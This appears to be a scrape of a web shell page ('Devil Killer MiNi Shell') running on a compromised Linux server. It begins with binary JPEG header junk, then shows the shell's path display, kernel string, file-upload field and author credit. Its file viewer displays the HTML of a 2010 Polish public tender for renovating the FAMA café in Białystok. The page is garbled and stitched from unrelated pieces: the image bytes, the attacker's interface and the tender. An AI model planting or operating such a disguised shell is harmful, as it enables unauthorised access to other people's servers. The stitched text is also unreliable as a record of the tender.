JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100730/232578-N-2010.html

<p class="kh_header"><b>Białystok: BOK/P/1/2010</b><br>
<b>Numer ogłoszenia: 232578 - 2010; data zamieszczenia: 30.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Białostocki Ośrodek Kultury , ul. Legionowa 5, 15-281 Białystok, woj. podlaskie, tel. 085 7424823, faks 085 7447023.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ośrodek kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BOK/P/1/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU  ZAMÓWIENIA
remontu i przebudowy kawiarni FAMA w Białymstoku przy ulicy Legionowej 5

1.	Opis podstawowych robót budowlanych

1.1. Roboty wyburzeniowe
	Usunięcie filara w przejściu pomiędzy drzwiami z holu do kawiarni
	Wymiana nadproży
	Zwężenie otworów
	Poszerzenie otworu na projektowanej drodze ewakuacyjnej
	Wyburzenie ściany wygradzającej szatnie
	usunięcie powłok malarskich ścian holu
	Demontaż ścianek działowych przyległych do baru
	Wyburzenie fragmentu sceny
	Demontaż pochylni i części antresoli
	Skucie podłóg i zerwanie wykładzin
	Usunięcie balustrad
	Skucie tynków ścian i słupów Sali kawiarniano-widowiskowej
	Demontaż ścianki z płyt GK  i nawiewników
	Demontaż sufitów podwieszanych w Sali konsumpcyjno - kawiarnianej 
	Wykucia brud i koryt
	Skucie glazury i terakoty w sanitariatach i demontaż sufitu podwieszanego
	Wyburzenie ścianek działowych sanitariatów
	Demontaż drzwi (wykucie ościeżnic)
	Skucie okładzin na zapleczu kuchennym (bez pom. kuchni i magazynu 13)

1.2.  Elementy projektowane

1.2.1. Sanitariaty i pomieszczenia socjalne
	Podłogi w toaletach, pomieszczeniach socjalnych, gospodarczych i technicznych z płytek typu gres
	Izolacje poziome z folii w płynie we wszystkich pomieszczeniach mokrych z wywinięciem 15 cm na ściany, dodatkowo uszczelnić wpusty, na naroża zastosować taśmy
	Ściany domurować nowe, wykończyć glazurą na kleje elastyczne i wodoodporne  wg rysunków, naroża wykończone bezlistewkowo, parametry płytek wg projektu. W ścianach wykonać dostęp do zaworów  instalacji z mocowaniem płytek na magnesy. Wykończenie ścian i sufitów wg rysunków
	Zamontować nowe urządzenia sanitarne wg specyfikacji
	Montaż nowych sufitów podwieszanych z płyt g-k wodoodpornych
	Montaż urządzeń wentylacyjnych i opraw wg projektów
	Montaż systemowych ścian w sanitariatach męskim i damskim
	Montaż drzwi ze szkła emaliowanego hartowanego i laminowanego oraz drzwi głównych fornirowanych
	Murowanie i montowanie nowych ścianek działowych pomieszczeń zaplecza 
	Wyłożenie schodów zaplecza gresem antypoślizgowym
	Montaż nowej stolarki drzwiowej pomieszczeń zaplecza

1.2.2. Hol wejściowy
	Podłogi po nafrezowaniu i zszorstkowaniu z płytek gres MARAZZI 60*60cm  monolith Mount Black wg wzorów - rysunków
	Ściany po skuciu tynków wypiastować i wykonać zabiegi uwidaczniające spoiny i rysunek cegły
	Wykonać gruntowanie ścian, malowanie natryskowe, wklejenie cokołu z ceownika
	Istniejące tynki sufitów i sufity podwieszane przetrzeć na gładko, zagruntować, pomalować farbami lateksowymi wg projektu
	Wykończenie  sufitu, oprawy - wg rysunków wykonawczych 
	Montaż szyn świetlnych w suficie
	Montaż zawiesi pod kraty, sklejki i grzejniki z montażem krat pomostowych maskujących grzejniki
	Montaż szklanych drzwi do Sali konsumpcyjno-kawiarnianej, piaskowanych z nadrukiem

1.2.3.  Sala konsumpcyjno - kawiarniana
	Podłoga ze szlifowanego betonu utwardzanego powierzchniowo po zdjęciu posadzki na gr. 8 cm
	Podłoga z deski olejowanej z drewna egzotycznego Merbau kl.1 o wym. 20*140*600-2000 mm w sali konsumpcyjnej
	Renowacja ścian z odsłonięciem rysunku cegły i spoin masami szpachlowymi
	Uzupełnienie ścian wg rysunków
	Roboty malarskie ścian farbami nakrapianymi z gruntowaniem
	Okładziny ścian cegłą klinkierową CRH z izolacją akustyczną wełną mineralną
	Sufity z heraklitu o wym.60*120
	Ułożenie posadzek z gresu w barze
	Montaż nad barem laminowanego hartowanego szkła kruszonego z otworami na oprawy świetlne
	Montaż w Sali konsumpcyjno-kawiarnianej stalowej rampy dla niepełnosprawnych wraz z balustradami
	Po demontażu schodów wykonać nowe wg rysunków ze stopniami z drewna litego orzech amerykański
	Montaż nowych balustrad z giętej sklejki i giętego szkła hartowanego
	Wykonanie powiększenia sceny ze schodami wysuwanymi
2. Opis robót sanitarnych

2.1. Kanalizacja sanitarna 
2.1.1. Rozwiązania technologiczne
	Ścieki z nowych pionów i leżaków kanalizacji sanitarnej podłączyć od przewodu istniejącego biegnącego pod posadzką i zakończyć zaworem napowietrzającym. W przypadku złego stanu technicznego głównego leżaka ks należy go wymienić
2.1.2. Rozwiązania materiałowe instalacji KS
	Piony i podejścia wykonać z rur PCV na wcisk
	Armatura i przybory sanitarne wg projektu architektury
	Dostawiane piony wyposażyć w czyszczak
2.1.3. Wytyczne montażu KS
	Rury układać na ścianach lub w bruzdach
	W przypadku możliwości podgrzewania przewodów powyżej 45°C, rury PCV zabezpieczyć izolacją cieplną
	Przejścia przez ściany wykonać w tulejach ochronnych

2.2. Instalacja wodociągowa
2.2.1. Rozwiązania technologiczne
	Źródłem wody będzie istniejąca instalacja wodociągowa w budynku
	Ciepła woda w sanitariatach z zaprojektowanych podgrzewaczy pojemnościowych
2.2.2. Rozwiązania materiałowe
	Instalację od pionów istniejących do odbiorników wykonać z rur polietylenowych PE-Xc z osłoną antydyfuzyjną prod. KAN 
	Rury z PE prowadzić w ścianach w ścianach lub posadzce w otulinie z pianki poliuretanowej gr. 6 mm przeznaczonej do zabetonowania
	Armatura odcinająca  - zawory kulowe z przyłączami gwintowanymi
	Przybory sanitarne i armatura czerpalna wg projektu architektury
2.2.3. Instalacja ppoż.
	Nie projektuje się przebudowy zasilania hydrantów

2.3. Centralne ogrzewanie
2.3.1. Rozwiązania technologiczne
	Źródłem ciepła będzie istniejąca instalacja c.o.
	Projektowana jest przebudowa instalacji w części sanitarnej i holu
2.3.2. Rozwiązania materiałowe
	Projektowaną instalację wykonać w systemie KAN-therm stosując rury PE-Xc z osłoną antydyfuzyjną
	Na rurociągi stosować izolację ciepłochronną  prefabrykowaną z PE lub PU o gr. 9 mm w wersji do zabetonowania
	Grzejniki PURMO typ Ventil Compact (CV) stalowe płytowe z wkładką zaworową i podejściem dolnym, a w holu głównym grzejniki dekoracyjne PURMO typ Narbonne V VT z wkładką zaworową i podejściem dolnym

2.4. Wentylacja 
2.4.1. Rozwiązania technologiczne
	Kuchnia ze zmywalnią  - nawiew poprzez nieszczelności, wywiew wentylator  kanałowy dwubiegowy pod stropem zmywalni
	Pomieszczenia sanitarne - nawiew przez kratki transferowe drzwi, wywiew - wentylatory systemu wentylacji jednorurowej w stropie podwieszonym
	Sala konsumpcyjna - nawiew przez otwory w ścianie z cegły klinkierowej, wywiew kanałowy przy scenie, wywiewniki nad i pod sceną
2.4.2. Wentylacja zmywalni i kuchni
	Wentylator dwubiegowy TD-800/200SILENT prod. Venture Industries
	Kanały okrągłe z blachy stalowej ocynkowanej Spiro, klasa szczelności A
2.4.3. Wentylacja pomieszczeń sanitarnych
	Wentylatory łazienkowe w suficie podwieszanym, system wentylacji jednorurowej ELS HELIOS. Wentylatory dwubiegowe  60/35 m3/h na pierwszym biegu praca ciągła, na drugim biegu po włączeniu oświetlenia z opóźnieniem czasowym wyłączenia
	Obudowa wentylatora HELIOS ELS-GU do montażu w sufitach podwieszanych, wkład wentylatorowy HELIOS ELS-VN 60/35 dwubiegowy ze zwłoką czasową
2.4.4. Wentylacja Sali konsumpcyjnej
	Projektowana przebudowa wentylacji mechanicznej nawiewno wywiewnej
	Pod przebudowywaną sceną projektuje się kanały wentylacyjne wywiewne blaszane prostokątne zaizolowane matami z wełny mineralnej o gr. 4 cm w płaszczu z folii aluminiowej
	Centrala wentylacyjna istniejąca bez zmian

3. Opis robót elektrycznych

3.1. instalacja oświetlenia ogólnego
	Oświetlenie ogólne z zastosowaniem opraw świetlówkowych, ledowych oraz żarowych
	Zasilanie oświetlenia z projektowanych rozdzielnic nowymi przewodami prowadzonymi w rurkach karbowanych giętkich
	Sterowanie oświetleniem Sali konsumpcyjnej za pomocą przycisków bistabilnych umieszczonych w trzech tablicach sterowania
3.2. Instalacja 230V i 400V
	Wymiana kabla zasilającego rozdzielnię RGF na kabel YKY 5*25mmw rurze osłonowej
	Zasilenia i obwody oraz rozwiązania materiałowe zgodnie z projektem
3.3. Instalacja przyzywowa
	Transformator zasilający zamontować w puszce p/t i zasilić z instalacji oświetleniowej
	Buczek z lampką zamontować nad drzwiami wc
3.4. ochrona przeciwporażeniowa
	Ochrona podstawowa izolacja części czynnych
	Ochrona dodatkowa poprzez samoczynne wyłączenie zasilania wyłącznikami nadmiaroprądowymi. Dodatkowo zaprojektowano wyłączniki przeciwporażeniowe różnicoprądowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9, 45.26.26.00-7, 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 10.000zł. w terminie składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - niespełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - niespełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - niespełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o udzieleniu co najmniej 3-letniej gwarancji i rękojmi</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>zamawiajacy dokona oceny wniosków wg.poniższego kryterium: zamawiajacy wybierze te wnioski, w których wykonawcy wykażą największą liczbę wykonanych zamówień,podobnych do niniejszego zamówienia o wart. min. 400.000 zł. potwierdzone referencjami,w przypadku gdy dwa lub więcej wniosków zawierać będzie taką sama liczbę wykonanych zamówien zamawiajacy spośród tych wniosków wybierze te, których łączna wartość zamówień będzie największa</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - termin realizacji - 0.20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego w Białymstoku przy ul. Legionowej 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 11:00, miejsce: Białostocki Ośrodek Kultury, 15-281 Białystok, ul. Legionowa 5 pok.nr. 18..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com